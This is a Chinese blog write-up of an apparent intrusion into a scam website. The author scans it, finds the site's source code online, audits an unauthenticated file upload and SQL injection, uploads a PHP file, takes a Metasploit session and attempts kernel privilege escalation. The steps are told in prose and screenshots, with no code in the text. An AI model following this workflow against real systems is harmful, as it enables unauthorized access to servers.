0X00 歪打正着
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163550961-1482957430.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163551967-170841006.png)
挨个访问能扫描出来的目录与文件发现并没有太大作用,不过发现了后台地址。phpmyadmin访问500。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163552592-619563116.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163558278-1710701290.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163600462-682161109.png)
试了下8888,123456之类的都提示错误,当场关闭。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163611093-700616642.png)
尝试子域名爆破也只有一个。Nmap扫描也没有什么发现。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163611615-1869783293.png)
0X01 寻找同类型网站以及源码
这种搞诈骗的很少会开发肯定源码是从网上下载找人搭建的,不常见就是特征,于是搜索了下。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163612516-4532310.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163613425-1885610835.png)
0X02 开始审计
这么多网站那源码肯定烂大街了,于是花了点时间找到了源码,尝试审计。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163614229-1380899455.png)
下载回来源码用seay扫描下,源码又太大我也懒得去本地搭建,直接用源码对着目标进行怼。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163614891-59028803.png)
从中发现了个fileupload.php文件好像有点问题。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163615599-530832557.png)
访问目标发现也存在该文件。把该文件提取出来到本地搭建的环境中做测试。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163616300-174373103.png)
直接访问会自动创建出upload和upload_tmp两个文件夹,这玩意是个demo这个点其实看起来更像个后门。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163616991-1802959290.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163617559-955086106.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163618229-1783550598.png)
继续往下看发现一些判断,可以表单上传名就为file。文件上传
其他的就不用管了,直接改个上传表单。只要加上参数name和file就行了。
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163623897-733736142.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163629594-2007209689.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163630237-1238685569.png)
上传后没有返回路径但是在upload下已经存在aaa.php文件。SQL注入
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163630965-939730268.png)
变量中where的值又是来自request中,并且上面的checkinput中也没有检测type的值。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163631576-1987748807.png)
跟入betListCnt
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163632275-728616145.png)
没有任何处理就直接带入查询了,类似点还有许多。0X03 验证审计到的漏洞
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163638479-34676068.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163639155-947150883.png)
发现有6379端口但是不是root用户启动的redis![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163639774-1341262932.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163640376-2025728682.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163641076-2033354811.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163641699-1643228765.png)
为了方便我就用msf上线了这台机器。然后寻找对应的提权exp。0X04 尝试提权
找到这两个CVE-2019-13272、CVE-2017-16995当我在github上找利用工具的时候,我想起msf其实也自带提权的。![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163642401-1392405184.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163643225-1758753628.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163648873-801114162.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163649541-196806770.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163650162-939513213.png)
![图片](https://img2023.cnblogs.com/blog/1049983/202401/1049983-20240105163650836-1046375393.png)
posted @
2024-01-05 16:37
渗透测试中心
阅读(
251)
评论()
编辑
收藏
举报